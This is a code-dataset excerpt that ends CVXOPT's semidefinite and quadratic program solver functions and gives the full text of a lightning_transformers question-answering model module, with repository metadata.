The inequalities sl >= 0 and zl >= 0 are elementwise vector
inequalities. The inequalities ss[k] >= 0, zs[k] >= 0 are matrix
inequalities, i.e., the symmetric matrices ss[k] and zs[k] must be
positive semidefinite. mat(Gs[k]*x) is the symmetric matrix X with
X[:] = Gs[k]*x. For a symmetric matrix, zs[k], vec(zs[k]) is the
vector zs[k][:].
Input arguments.
Gl is a dense or sparse 'd' matrix of size (ml, n). hl is a
dense 'd' matrix of size (ml, 1). The default values of Gl and hl
are matrices with zero rows.
The argument Gs is a list of N dense or sparse 'd' matrices of
size (m[k]**2, n), k = 0, ..., N-1. The columns of Gs[k]
represent symmetric matrices stored as vectors in column major
order. hs is a list of N dense 'd' matrices of size (m[k], m[k]),
k = 0, ..., N-1. The columns of Gs[k] and the matrices hs[k]
represent symmetric matrices in 'L' storage, i.e., only the lower
triangular elements are accessed. The default values of Gs and
hs are empty lists.
A is a dense or sparse 'd' matrix of size (p,n). b is a dense 'd'
matrix of size (p,1). The default values of A and b are matrices
with zero rows.
solver is None or 'dsdp'. The default solver (None) calls
cvxopt.conelp(). The 'dsdp' solver uses an interface to DSDP5.
The 'dsdp' solver does not accept problems with equality
constraints (A and b must have zero rows, or be absent).
The argument primalstart is a dictionary with keys 'x', 'sl',
'ss', and specifies an optional primal starting point.
primalstart['x'] is a dense 'd' matrix of length n;
primalstart['sl'] is a positive dense 'd' matrix of length ml;
primalstart['ss'] is a list of positive definite matrices of
size (ms[k], ms[k]). Only the lower triangular parts of these
matrices will be accessed.
The argument dualstart is a dictionary with keys 'zl', 'zs', 'y'
and specifies an optional dual starting point.
dualstart['y'] is a dense 'd' matrix of length p;
dualstart['zl'] must be a positive dense 'd' matrix of length ml;
dualstart['zs'] is a list of positive definite matrices of
size (ms[k], ms[k]). Only the lower triangular parts of these
matrices will be accessed.
The arguments primalstart and dualstart are ignored when solver
is 'dsdp'.
Output arguments.
Returns a dictionary with keys 'status', 'x', 'sl', 'ss', 'zl',
'zs', 'y', 'primal objective', 'dual objective', 'gap',
'relative gap', 'primal infeasibility', 'dual infeasibility',
'primal slack', 'dual slack', 'residual as primal infeasibility
certificate', 'residual as dual infeasibility certificate'.
The 'status' field has values 'optimal', 'primal infeasible',
'dual infeasible', or 'unknown'. The values of the other fields
depend on the exit status and the solver used.
Status 'optimal'.
- 'x', 'sl', 'ss', 'y', 'zl', 'zs' are an approximate solution of
the primal and dual optimality conditions
G*x + s = h, A*x = b
G'*z + A'*y + c = 0
s >= 0, z >= 0
s'*z = 0
where
G = [ Gl; Gs[0][:]; ...; Gs[N-1][:] ]
h = [ hl; hs[0][:]; ...; hs[N-1][:] ]
s = [ sl; ss[0][:]; ...; ss[N-1][:] ]
z = [ zl; zs[0][:]; ...; zs[N-1][:] ].
- 'primal objective': the primal objective c'*x.
- 'dual objective': the dual objective -h'*z - b'*y.
- 'gap': the duality gap s'*z.
- 'relative gap': the relative gap, defined as s'*z / -c'*x if
the primal objective is negative, s'*z / -(h'*z + b'*y) if the
dual objective is positive, and None otherwise.
- 'primal infeasibility': the residual in the primal constraints,
defined as the maximum of the residual in the inequalities
|| G*x + s + h || / max(1, ||h||)
and the residual in the equalities
|| A*x - b || / max(1, ||b||).
- 'dual infeasibility': the residual in the dual constraints,
defined as
|| G'*z + A'*y + c || / max(1, ||c||).
- 'primal slack': the smallest primal slack,
min( min_k sl_k, min_k lambda_min(mat(ss[k])) ).
- 'dual slack': the smallest dual slack,
min( min_k zl_k, min_k lambda_min(mat(zs[k])) ).
- 'residual as primal infeasibility certificate': None.
- 'residual as dual infeasibility certificate': None.
If the default solver is used, the primal infeasibility is
guaranteed to be less than solvers.options['feastol']
(default 1e-7). The dual infeasibility is guaranteed to be less
than solvers.options['feastol'] (default 1e-7). The gap is less
than solvers.options['abstol'] (default 1e-7) or the relative gap
is less than solvers.options['reltol'] (default 1e-6).
If the DSDP solver is used, the default DSDP exit criteria
apply.
Status 'primal infeasible'.
- 'x', 'sl', 'ss': None.
- 'y', 'zl', 'zs' are an approximate certificate of infeasibility
-h'*z - b'*y = 1, G'*z + A'*y = 0, z >= 0.
- 'primal objective': None.
- 'dual objective': 1.0.
- 'gap', 'relative gap': None.
- 'primal infeasibility' and 'dual infeasibility': None.
- 'primal slack': None
- 'dual slack': the smallest dual slack,
min( min_k zl_k, min_k lambda_min(mat(zs[k])) ).
- 'residual as primal infeasibility certificate': the residual in
the condition of the infeasibility certificate, defined as
|| G'*z + A'*y || / max(1, ||c||).
- 'residual as dual infeasibility certificate': None.
If the default solver is used, the residual as primal infeasiblity
certificate is guaranteed to be less than
solvers.options['feastol'] (default 1e-7). If the DSDP solver is
used, the default DSDP exit criteria apply.
Status 'dual infeasible'.
- 'x', 'sl', 'ss': an approximate proof of dual infeasibility
c'*x = -1, G*x + s = 0, A*x = 0, s >= 0.
- 'y', 'zl', 'zs': None.
- 'primal objective': -1.0.
- 'dual objective': None.
- 'gap', 'relative gap': None.
- 'primal infeasibility' and 'dual infeasibility': None.
- 'primal slack': the smallest primal slack,
min( min_k sl_k, min_k lambda_min(mat(ss[k])) ).
- 'dual slack': None.
- 'residual as primal infeasibility certificate': None.
- 'residual as dual infeasibility certificate: the residual in
the conditions of the infeasibility certificate, defined as
the maximum of
|| G*x + s || / max(1, ||h||) and || A*x || / max(1, ||b||).
If the default solver is used, the residual as dual infeasiblity
certificate is guaranteed to be less than
solvers.options['feastol'] (default 1e-7). If the MOSEK solver
is used, the default MOSEK exit criteria apply.
Status 'unknown'. If the DSDP solver is used, all the fields
except the status field are empty. If the default solver
is used, the values are as follows.
- 'x', 'y', 'sl', 'ss', 'zl', 'zs': the last iterates before
termination. These satisfy s > 0 and z > 0, but are not
necessarily feasible.
- 'primal objective': the primal cost c'*x.
- 'dual objective': the dual cost -h'*z - b'*y.
- 'gap': the duality gap s'*z.
- 'relative gap': the relative gap, defined as s'*z / -c'*x if the
primal cost is negative, s'*z / -(h'*z + b'*y) if the dual cost
is positive, and None otherwise.
- 'primal infeasibility ': the residual in the primal constraints,
defined as the maximum of the residual in the inequalities
|| G*x + s + h || / max(1, ||h||)
and the residual in the equalities
|| A*x - b || / max(1, ||b||).
- 'dual infeasibility': the residual in the dual constraints,
defined as
|| G'*z + A'*y + c || / max(1, ||c||).
- 'primal slack': the smallest primal slack,
min( min_k sl_k, min_k lambda_min(mat(ss[k])) ).
- 'dual slack': the smallest dual slack,
min( min_k zl_k, min_k lambda_min(mat(zs[k])) ).
- 'residual as primal infeasibility certificate':
None if h'*z + b'*y >= 0; the residual
|| G'*z + A'*y || / (-(h'*z + b'*y) * max(1, ||c||) )
otherwise.
- 'residual as dual infeasibility certificate':
None if c'*x >= 0; the maximum of the residuals
|| G*x + s || / (-c'*x * max(1, ||h||))
and
|| A*x || / (-c'*x * max(1, ||b||))
otherwise.
Termination with status 'unknown' indicates that the algorithm
failed to find a solution that satisfies the specified tolerances.
In some cases, the returned solution may be fairly accurate. If
the primal and dual infeasibilities, the gap, and the relative gap
are small, then x, y, s, z are close to optimal. If the residual
as primal infeasibility certificate is small, then
y / (-h'*z - b'*y), z / (-h'*z - b'*y)
provide an approximate certificate of primal infeasibility. If
the residual as certificate of dual infeasibility is small, then
x / (-c'*x), s / (-c'*x)
provide an approximate proof of dual infeasibility.
Control parameters.
The following parameters control the execution of the default
solver.
options['show_progress'] True/False (default: True)
options['maxiters'] positive integer (default: 100)
options['refinement'] positive integer (default: 1)
options['abstol'] scalar (default: 1e-7)
options['reltol'] scalar (default: 1e-6)
options['feastol'] scalar (default: 1e-7).
The execution of the 'dsdp' solver is controlled by:
options['DSDP_Monitor'] integer (default: 0)
options['DSDP_MaxIts'] positive integer
options['DSDP_GapTolerance'] scalar (default: 1e-5).
"""
options = kwargs.get('options',globals()['options'])
import math
from cvxopt import base, blas, misc
from cvxopt.base import matrix, spmatrix
if not isinstance(c,matrix) or c.typecode != 'd' or c.size[1] != 1:
raise TypeError("'c' must be a dense column matrix")
n = c.size[0]
if n < 1: raise ValueError("number of variables must be at least 1")
if Gl is None: Gl = spmatrix([], [], [], (0,n), tc='d')
if not isinstance(Gl,(matrix,spmatrix)) or Gl.typecode != 'd' or Gl.size[1] != n:
raise TypeError("'Gl' must be a dense or sparse 'd' matrix "\
"with %d columns" %n)
ml = Gl.size[0]
if hl is None: hl = matrix(0.0, (0,1))
if not isinstance(hl,matrix) or hl.typecode != 'd' or \
hl.size != (ml,1):
raise TypeError("'hl' must be a 'd' matrix of size (%d,1)" %ml)
if Gs is None: Gs = []
if not isinstance(Gs,list) or [ G for G in Gs if not isinstance(G,(matrix,spmatrix)) \
or G.typecode != 'd' or G.size[1] != n ]:
raise TypeError("'Gs' must be a list of sparse or dense 'd' "\
"matrices with %d columns" %n)
ms = [ int(math.sqrt(G.size[0])) for G in Gs ]
a = [ k for k in range(len(ms)) if ms[k]**2 != Gs[k].size[0] ]
if a: raise TypeError("the squareroot of the number of rows in "\
"'Gs[%d]' is not an integer" %k)
if hs is None: hs = []
if not isinstance(hs,list) or len(hs) != len(ms) \
or [ h for h in hs if not isinstance(h,(matrix,spmatrix)) or h.typecode != 'd' ]:
raise TypeError("'hs' must be a list of %d dense or sparse "\
"'d' matrices" %len(ms))
a = [ k for k in range(len(ms)) if hs[k].size != (ms[k],ms[k]) ]
if a:
k = a[0]
raise TypeError("hs[%d] has size (%d,%d). Expected size is "\
"(%d,%d)." %(k,hs[k].size[0], hs[k].size[1], ms[k], ms[k]))
if A is None: A = spmatrix([], [], [], (0,n), 'd')
if not isinstance(A,(matrix,spmatrix)) or A.typecode != 'd' or A.size[1] != n:
raise TypeError("'A' must be a dense or sparse 'd' matrix "\
"with %d columns" %n)
p = A.size[0]
if b is None: b = matrix(0.0, (0,1))
if not isinstance(b,matrix) or b.typecode != 'd' or b.size != (p,1):
raise TypeError("'b' must be a dense matrix of size (%d,1)" %p)
dims = {'l': ml, 'q': [], 's': ms}
N = ml + sum([ m**2 for m in ms ])
if solver == 'dsdp':
try: from cvxopt import dsdp
except ImportError: raise ValueError("invalid option "\
"(solver = 'dsdp'): cvxopt.dsdp is not installed")
if p: raise ValueError("sdp() with the solver = 'dsdp' option "\
"does not handle problems with equality constraints")
opts = options.get('dsdp',None)
if opts:
dsdpstatus, x, r, zl, zs = dsdp.sdp(c, Gl, hl, Gs, hs, options = opts)
else:
dsdpstatus, x, r, zl, zs = dsdp.sdp(c, Gl, hl, Gs, hs)
resx0 = max(1.0, blas.nrm2(c))
rh = matrix([ blas.nrm2(hl) ] + [ math.sqrt(misc.sdot2(hsk, hsk))
for hsk in hs ])
resz0 = max(1.0, blas.nrm2(rh))
if dsdpstatus == 'DSDP_UNBOUNDED':
status = 'dual infeasible'
cx = blas.dot(c,x)
blas.scal(-1.0/cx, x)
sl = -Gl*x
ss = [ -matrix(Gs[k]*x, (ms[k], ms[k])) for k in
range(len(ms)) ]
for k in range(len(ms)):
misc.symm(ss[k], ms[k])
# rz = s + G*x
rz = matrix( [sl] + [ssk[:] for ssk in ss])
base.gemv(Gl, x, rz, beta = 1.0)
ind = ml
for k in range(len(ms)):
base.gemv(Gs[k], x, rz, beta = 1.0, offsety = ind)
ind += ms[k]**2
dims = {'l': ml, 's': ms, 'q': []}
resz = misc.nrm2(rz, dims) / resz0
s = matrix(0.0, (N,1))
blas.copy(sl, s)
ind = ml
for k in range(len(ms)):
blas.copy(ss[k], s, offsety = ind)
ind += ms[k]
pslack = -misc.max_step(s, dims)
sslack = None
pres, dres = None, None
dinfres, pinfres = resz, None
zl, zs, y = None, None, None
pcost, dcost = -1.0, None
gap, relgap = None, None
elif dsdpstatus == 'DSDP_INFEASIBLE':
status = 'primal infeasible'
y = matrix(0.0, (0,1))
hz = blas.dot(hl, zl) + misc.sdot2(hs, zs)
blas.scal(1.0 / -hz, zl)
for k in range(len(ms)):
blas.scal(1.0 / -hz, zs[k])
misc.symm(zs[k], ms[k])
# rx = -G'*z
rx = matrix(0.0, (n,1))
base.gemv(Gl, zl, rx, alpha = -1.0, beta = 1.0, trans = 'T')
ind = 0
for k in range(len(ms)):
blas.scal(0.5, zs[k], inc=ms[k]+1)
for j in range(ms[k]):
blas.scal(0.0, zs[k], offset=j+ms[k]*(j+1), inc=ms[k])
base.gemv(Gs[k], zs[k], rx, alpha=2.0, beta=1.0, trans='T')
blas.scal(2.0, zs[k], inc=ms[k]+1)
ind += ms[k]
pinfres = blas.nrm2(rx) / resx0
dinfres = None
z = matrix(0.0, (N,1))
blas.copy(zl, z)
ind = ml
for k in range(len(ms)):
blas.copy(zs[k], z, offsety = ind)
ind += ms[k]
dslack = -misc.max_step(z, dims)
pslack = None
x, sl, ss = None, None, None
pres, dres = None, None
pcost, dcost = None, 1.0
gap, relgap = None, None
else:
if dsdpstatus == 'DSDP_PDFEASIBLE':
status = 'optimal'
else:
status = 'unknown'
y = matrix(0.0, (0,1))
sl = hl - Gl*x
ss = [ hs[k] - matrix(Gs[k]*x, (ms[k], ms[k])) for k in
range(len(ms)) ]
for k in range(len(ms)):
misc.symm(ss[k], ms[k])
misc.symm(zs[k], ms[k])
pcost = blas.dot(c,x)
dcost = -blas.dot(hl,zl) - misc.sdot2(hs, zs)
gap = blas.dot(sl, zl) + misc.sdot2(ss, zs)
if pcost < 0.0:
relgap = gap / -pcost
elif dcost > 0.0:
relgap = gap / dcost
else:
relgap = None
# rx = c + G'*z
rx = matrix(c)
base.gemv(Gl, zl, rx, beta = 1.0, trans = 'T')
ind = 0
for k in range(len(ms)):
blas.scal(0.5, zs[k], inc = ms[k]+1)
for j in range(ms[k]):
blas.scal(0.0, zs[k], offset=j+ms[k]*(j+1), inc=ms[k])
base.gemv(Gs[k], zs[k], rx, alpha=2.0, beta=1.0, trans='T')
blas.scal(2.0, zs[k], inc=ms[k]+1)
ind += ms[k]
resx = blas.nrm2(rx) / resx0
# rz = G*x + s - h
rz = matrix(0.0, (ml + sum([msk**2 for msk in ms]), 1))
base.gemv(Gl, x, rz)
blas.axpy(sl, rz)
blas.axpy(hl, rz, alpha = -1.0)
ind = ml
for k in range(len(ms)):
base.gemv(Gs[k], x, rz, offsety = ind)
blas.axpy(ss[k], rz, offsety = ind, n = ms[k]**2)
blas.axpy(hs[k], rz, alpha = -1.0, offsety = ind,
n = ms[k]**2)
ind += ms[k]**2
resz = misc.snrm2(rz, dims) / resz0
pres, dres = resz, resx
s, z = matrix(0.0, (N,1)), matrix(0.0, (N,1))
blas.copy(sl, s)
blas.copy(zl, z)
ind = ml
for k in range(len(ms)):
blas.copy(ss[k], s, offsety = ind)
blas.copy(zs[k], z, offsety = ind)
ind += ms[k]
pslack = -misc.max_step(s, dims)
dslack = -misc.max_step(z, dims)
if status == 'optimal' or dcost <= 0.0:
pinfres = None
else:
# rx = G'*z
rx = matrix(0.0, (n,1))
base.gemv(Gl, zl, rx, beta = 1.0, trans = 'T')
ind = 0
for k in range(len(ms)):
blas.scal(0.5, zs[k], inc = ms[k]+1)
for j in range(ms[k]):
blas.scal(0.0, zs[k], offset=j+ms[k]*(j+1),
inc=ms[k])
base.gemv(Gs[k], zs[k], rx, alpha=2.0, beta=1.0,
trans='T')
blas.scal(2.0, zs[k], inc=ms[k]+1)
ind += ms[k]
pinfres = blas.nrm2(rx) / resx0 / dcost
if status == 'optimal' or pcost >= 0.0:
dinfres = None
else:
# rz = G*x + s
rz = matrix(0.0, (ml + sum([msk**2 for msk in ms]), 1))
base.gemv(Gl, x, rz)
blas.axpy(sl, rz)
ind = ml
for k in range(len(ms)):
base.gemv(Gs[k], x, rz, offsety = ind)
blas.axpy(ss[k], rz, offsety = ind, n = ms[k]**2)
ind += ms[k]**2
dims = {'l': ml, 's': ms, 'q': []}
dinfres = misc.snrm2(rz, dims) / resz0 / -pcost
return {'status': status, 'x': x, 'sl': sl, 'ss': ss, 'y': y,
'zl': zl, 'zs': zs, 'primal objective': pcost,
'dual objective': dcost, 'gap': gap, 'relative gap': relgap,
'primal infeasibility': pres, 'dual infeasibility': dres,
'residual as primal infeasibility certificate': pinfres,
'residual as dual infeasibility certificate': dinfres,
'primal slack': pslack, 'dual slack': dslack}
h = matrix(0.0, (N,1))
if isinstance(Gl,matrix) or [ Gk for Gk in Gs if isinstance(Gk,matrix) ]:
G = matrix(0.0, (N, n))
else:
G = spmatrix([], [], [], (N, n), 'd')
h[:ml] = hl
G[:ml,:] = Gl
ind = ml
for k in range(len(ms)):
m = ms[k]
h[ind : ind + m*m] = hs[k][:]
G[ind : ind + m*m, :] = Gs[k]
ind += m**2
if primalstart:
ps = {}
ps['x'] = primalstart['x']
ps['s'] = matrix(0.0, (N,1))
if ml: ps['s'][:ml] = primalstart['sl']
if ms:
ind = ml
for k in range(len(ms)):
m = ms[k]
ps['s'][ind : ind + m*m] = primalstart['ss'][k][:]
ind += m**2
else:
ps = None
if dualstart:
ds = {}
if p: ds['y'] = dualstart['y']
ds['z'] = matrix(0.0, (N,1))
if ml: ds['z'][:ml] = dualstart['zl']
if ms:
ind = ml
for k in range(len(ms)):
m = ms[k]
ds['z'][ind : ind + m*m] = dualstart['zs'][k][:]
ind += m**2
else:
ds = None
sol = conelp(c, G, h, dims, A = A, b = b, primalstart = ps, dualstart = ds, kktsolver = kktsolver, options = options)
if sol['s'] is None:
sol['sl'] = None
sol['ss'] = None
else:
sol['sl'] = sol['s'][:ml]
sol['ss'] = [ matrix(0.0, (mk, mk)) for mk in ms ]
ind = ml
for k in range(len(ms)):
m = ms[k]
sol['ss'][k][:] = sol['s'][ind:ind+m*m]
ind += m**2
del sol['s']
if sol['z'] is None:
sol['zl'] = None
sol['zs'] = None
else:
sol['zl'] = sol['z'][:ml]
sol['zs'] = [ matrix(0.0, (mk, mk)) for mk in ms ]
ind = ml
for k in range(len(ms)):
m = ms[k]
sol['zs'][k][:] = sol['z'][ind:ind+m*m]
ind += m**2
del sol['z']
return sol
def qp(P, q, G = None, h = None, A = None, b = None, solver = None,
kktsolver = None, initvals = None, **kwargs):
"""
Solves a quadratic program
minimize (1/2)*x'*P*x + q'*x
subject to G*x <= h
A*x = b.
Input arguments.
P is a n x n dense or sparse 'd' matrix with the lower triangular
part of P stored in the lower triangle. Must be positive
semidefinite.
q is an n x 1 dense 'd' matrix.
G is an m x n dense or sparse 'd' matrix.
h is an m x 1 dense 'd' matrix.
A is a p x n dense or sparse 'd' matrix.
b is a p x 1 dense 'd' matrix or None.
solver is None or 'mosek'.
The default values for G, h, A and b are empty matrices with
zero rows.
Output arguments (default solver).
Returns a dictionary with keys 'status', 'x', 's', 'y', 'z',
'primal objective', 'dual objective', 'gap', 'relative gap',
'primal infeasibility, 'dual infeasibility', 'primal slack',
'dual slack'.
The 'status' field has values 'optimal' or 'unknown'.
If the status is 'optimal', 'x', 's', 'y', 'z' are an approximate
solution of the primal and dual optimal solutions
G*x + s = h, A*x = b
P*x + G'*z + A'*y + q = 0
s >= 0, z >= 0
s'*z = o.
If the status is 'unknown', 'x', 's', 'y', 'z' are the last
iterates before termination. These satisfy s > 0 and z > 0, but
are not necessarily feasible.
The values of the other fields are defined as follows.
- 'primal objective': the primal objective (1/2)*x'*P*x + q'*x.
- 'dual objective': the dual objective
L(x,y,z) = (1/2)*x'*P*x + q'*x + z'*(G*x - h) + y'*(A*x-b).
- 'gap': the duality gap s'*z.
- 'relative gap': the relative gap, defined as
gap / -primal objective
if the primal objective is negative,
gap / dual objective
if the dual objective is positive, and None otherwise.
- 'primal infeasibility': the residual in the primal constraints,
defined as the maximum of the residual in the inequalities
|| G*x + s + h || / max(1, ||h||)
and the residual in the equalities
|| A*x - b || / max(1, ||b||).
- 'dual infeasibility': the residual in the dual constraints,
defined as
|| P*x + G'*z + A'*y + q || / max(1, ||q||).
- 'primal slack': the smallest primal slack, min_k s_k.
- 'dual slack': the smallest dual slack, min_k z_k.
If the exit status is 'optimal', then the primal and dual
infeasibilities are guaranteed to be less than
solvers.options['feastol'] (default 1e-7). The gap is less than
solvers.options['abstol'] (default 1e-7) or the relative gap is
less than solvers.options['reltol'] (default 1e-6).
Termination with status 'unknown' indicates that the algorithm
failed to find a solution that satisfies the specified tolerances.
In some cases, the returned solution may be fairly accurate. If
the primal and dual infeasibilities, the gap, and the relative gap
are small, then x, y, s, z are close to optimal.
Output arguments (MOSEK solver).
The return dictionary has two additional fields
'residual as primal infeasibility certificate' and
'residual as dual infeasibility certificate', and 'status' field
can also have the values 'primal infeasible' or 'dual infeasible'.
If the exit status is 'optimal', the different fields have the
same meaning as for the default solver, but the the magnitude of
the residuals and duality gap is controlled by the MOSEK exit
criteria. The 'residual as primal infeasibility certificate' and
'residual as dual infeasibility certificate' are None.
Status 'primal infeasible'.
- 'x', 's': None.
- 'y', 'z' are an approximate certificate of infeasibility
G'*z + A'*y = 0, h'*z + b'*y = -1, z >= 0.
- 'primal objective': None.
- 'dual objective': 1.0.
- 'gap', 'relative gap': None.
- 'primal infeasibility' and 'dual infeasibility': None.
- 'primal slack': None.
- 'dual slack': the smallest dual slack min z_k.
- 'residual as primal infeasibility certificate': the residual in
the condition of the infeasibility certificate, defined as
|| G'*z + A'*y || / max(1, ||c||).
- 'residual as dual infeasibility certificate': None.
Status 'dual infeasible'.
- 'x', 's' are an approximate proof of dual infeasibility
P*x = 0, q'*x = -1, G*x + s = 0, A*x = 0, s >= 0.
- 'y', 'z': None.
- 'primal objective': -1.0.
- 'dual objective': None.
- 'gap', 'relative gap': None.
- 'primal infeasibility' and 'dual infeasibility': None.
- 'primal slack': the smallest primal slack min_k s_k .
- 'dual slack': None.
- 'residual as primal infeasibility certificate': None.
- 'residual as dual infeasibility certificate: the residual in
the conditions of the infeasibility certificate, defined as
the maximum of
|| P*x || / max(1, ||q||),
|| G*x + s || / max(1, ||h||),
|| A*x || / max(1, ||b||).
If status is 'unknown', all the other fields are None.
Control parameters.
The control parameters for the different solvers can be modified
by adding an entry to the dictionary cvxopt.solvers.options. The
following parameters control the execution of the default solver.
options['show_progress'] True/False (default: True)
options['maxiters'] positive integer (default: 100)
options['refinement'] positive integer (default: 0)
options['abstol'] scalar (default: 1e-7)
options['reltol'] scalar (default: 1e-6)
options['feastol'] scalar (default: 1e-7).
The MOSEK parameters can me modified by adding an entry
options['mosek'], containing a dictionary with MOSEK
parameter/value pairs, as described in the MOSEK documentation.
Options that are not recognized are replaced by their default
values.
"""
options = kwargs.get('options',globals()['options'])
from cvxopt import base, blas
from cvxopt.base import matrix, spmatrix
if solver == 'mosek':
from cvxopt import misc
try:
from cvxopt import msk
import mosek
except ImportError: raise ValueError("invalid option "\
"(solver='mosek'): cvxopt.msk is not installed")
opts = options.get('mosek',None)
if opts:
solsta, x, z, y = msk.qp(P, q, G, h, A, b, options=opts)
else:
solsta, x, z, y = msk.qp(P, q, G, h, A, b)
n = q.size[0]
if G is None: G = spmatrix([], [], [], (0,n), 'd')
if h is None: h = matrix(0.0, (0,1))
if A is None: A = spmatrix([], [], [], (0,n), 'd')
if b is None: b = matrix(0.0, (0,1))
m = G.size[0]
resx0 = max(1.0, blas.nrm2(q))
resy0 = max(1.0, blas.nrm2(b))
resz0 = max(1.0, blas.nrm2(h))
if solsta in (mosek.solsta.optimal, getattr(mosek.solsta,'near_optimal',None)):
if solsta is mosek.solsta.optimal: status = 'optimal'
else: status = 'near optimal'
s = matrix(h)
base.gemv(G, x, s, alpha = -1.0, beta = 1.0)
# rx = q + P*x + G'*z + A'*y
# pcost = 0.5 * x'*P*x + q'*x
rx = matrix(q)
base.symv(P, x, rx, beta = 1.0)
pcost = 0.5 * (blas.dot(x, rx) + blas.dot(x, q))
base.gemv(A, y, rx, beta = 1.0, trans = 'T')
base.gemv(G, z, rx, beta = 1.0, trans = 'T')
resx = blas.nrm2(rx) / resx0
# ry = A*x - b
ry = matrix(b)
base.gemv(A, x, ry, alpha = 1.0, beta = -1.0)
resy = blas.nrm2(ry) / resy0
# rz = G*x + s - h
rz = matrix(0.0, (m,1))
base.gemv(G, x, rz)
blas.axpy(s, rz)
blas.axpy(h, rz, alpha = -1.0)
resz = blas.nrm2(rz) / resz0
gap = blas.dot(s, z)
dcost = pcost + blas.dot(y, ry) + blas.dot(z, rz) - gap
if pcost < 0.0:
relgap = gap / -pcost
elif dcost > 0.0:
relgap = gap / dcost
else:
relgap = None
dims = {'l': m, 's': [], 'q': []}
pslack = -misc.max_step(s, dims)
dslack = -misc.max_step(z, dims)
pres, dres = max(resy, resz), resx
pinfres, dinfres = None, None
elif solsta == mosek.solsta.prim_infeas_cer:
status = 'primal infeasible'
hz, by = blas.dot(h, z), blas.dot(b, y)
blas.scal(1.0 / (-hz - by), y)
blas.scal(1.0 / (-hz - by), z)
# rx = -A'*y - G'*z
rx = matrix(0.0, (q.size[0],1))
base.gemv(A, y, rx, alpha = -1.0, trans = 'T')
base.gemv(G, z, rx, alpha = -1.0, beta = 1.0, trans = 'T')
pinfres = blas.nrm2(rx) / resx0
dinfres = None
x, s = None, None
pres, dres = None, None
pcost, dcost = None, 1.0
gap, relgap = None, None
dims = {'l': m, 's': [], 'q': []}
dslack = -misc.max_step(z, dims)
pslack = None
elif solsta == mosek.solsta.dual_infeas_cer:
status = 'dual infeasible'
qx = blas.dot(q,x)
blas.scal(-1.0/qx, x)
s = matrix(0.0, (m,1))
base.gemv(G, x, s, alpha=-1.0)
z, y = None, None
# rz = P*x
rx = matrix(0.0, (q.size[0],1))
base.symv(P, x, rx, beta = 1.0)
resx = blas.nrm2(rx) / resx0
# ry = A*x
ry = matrix(0.0, (b.size[0],1))
base.gemv(A, x, ry)
resy = blas.nrm2(ry) / resy0
# rz = s + G*x
rz = matrix(s)
base.gemv(G, x, rz, beta = 1.0)
resz = blas.nrm2(rz) / resz0
pres, dres = None, None
dinfres, pinfres = max(resx, resy, resz), None
z, y = None, None
pcost, dcost = -1.0, None
gap, relgap = None, None
dims = {'l': m, 's': [], 'q': []}
pslack = -misc.max_step(s, dims)
dslack = None
else:
status = 'unknown'
x, s, y, z = None, None, None, None
pcost, dcost = None, None
gap, relgap = None, None
pres, dres = None, None
pslack, dslack = None, None
pinfres, dinfres = None, None
return {'status': status, 'x': x, 's': s, 'y': y, 'z': z,
'primal objective': pcost, 'dual objective': dcost,
'gap': gap, 'relative gap': relgap,
'primal infeasibility': pres, 'dual infeasibility': dres,
'primal slack': pslack, 'dual slack': dslack,
'residual as primal infeasibility certificate': pinfres,
'residual as dual infeasibility certificate': dinfres}
return coneqp(P, q, G, h, None, A, b, initvals, kktsolver = kktsolver, options = options)
| 37.46099 | 121 | 0.490949 |
60499d1a9f22a82081bc4deae975fabf24aa9fc4 | 3,022 | py | Python | lightning_transformers/task/nlp/question_answering/model.py | yuvalkirstain/lightning-transformers | 7afa49ee9d298b947cf8f2a8f462f1a01fd3fe90 | [
"Apache-2.0"
] | null | null | null | lightning_transformers/task/nlp/question_answering/model.py | yuvalkirstain/lightning-transformers | 7afa49ee9d298b947cf8f2a8f462f1a01fd3fe90 | [
"Apache-2.0"
] | null | null | null | lightning_transformers/task/nlp/question_answering/model.py | yuvalkirstain/lightning-transformers | 7afa49ee9d298b947cf8f2a8f462f1a01fd3fe90 | [
"Apache-2.0"
] | null | null | null | # Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from functools import partial
from typing import Any
import torch
from lightning_transformers.core.nlp import HFTransformer
from lightning_transformers.task.nlp.question_answering import QuestionAnsweringDataModule
from lightning_transformers.task.nlp.question_answering.datasets.squad.metric import SquadMetric
class QuestionAnsweringTransformer(HFTransformer):
"""Defines ``LightningModule`` for the Question Answering Task.
Args:
*args: :class:`lightning_transformers.core.nlp.HFTransformer` arguments.
downstream_model_type: Downstream HuggingFace AutoModel to load.
(default ``transformers.AutoModelForQuestionAnswering``)
**kwargs: :class:`lightning_transformers.core.nlp.HFTransformer` arguments.
"""
def __init__(
self, *args, downstream_model_type: str = "transformers.AutoModelForQuestionAnswering", cfg, **kwargs
) -> None:
super().__init__(downstream_model_type, *args, **kwargs)
self.cfg = cfg
def training_step(self, batch: Any, batch_idx: int) -> torch.Tensor:
outputs = self.model(**batch)
loss = outputs[0]
self.log("train_loss", loss)
return loss
@property
def hf_pipeline_task(self) -> str:
return "question-answering"
def validation_step(self, batch: Any, batch_idx: int, dataloader_idx: int = 0) -> None:
batch.pop("offset_mapping")
example_ids = batch.pop("example_id")
outputs = self.model(**batch)
self.metric.update(example_ids, outputs.start_logits, outputs.end_logits)
def on_validation_epoch_start(self) -> None:
self.metric.reset()
def on_validation_epoch_end(self) -> None:
metric_dict = self.metric.compute()
self.log_dict(metric_dict, prog_bar=True)
def configure_metrics(self, stage: str):
dataset: QuestionAnsweringDataModule = self.trainer.datamodule
validation_dataset = dataset.ds["validation"]
original_validation_dataset = dataset.ds["validation_original"]
postprocess_func = partial(
dataset.postprocess_func,
dataset=dataset.ds,
validation_dataset=validation_dataset,
original_validation_dataset=original_validation_dataset,
)
example_id_strings = dataset.example_id_strings
self.metric = SquadMetric(postprocess_func=postprocess_func, example_id_strings=example_id_strings)
| 40.293333 | 109 | 0.723362 |
c3d268973d6b4d276266467aa89c44e604ad9076 | 366 | py | Python | contests/atcoder/abc086/abc086_b/main.py | conao3/coder | 2cdb610fec013da88a3470d460108e8a9b462445 | [
"CC0-1.0"
] | null | null | null | contests/atcoder/abc086/abc086_b/main.py | conao3/coder | 2cdb610fec013da88a3470d460108e8a9b462445 | [
"CC0-1.0"
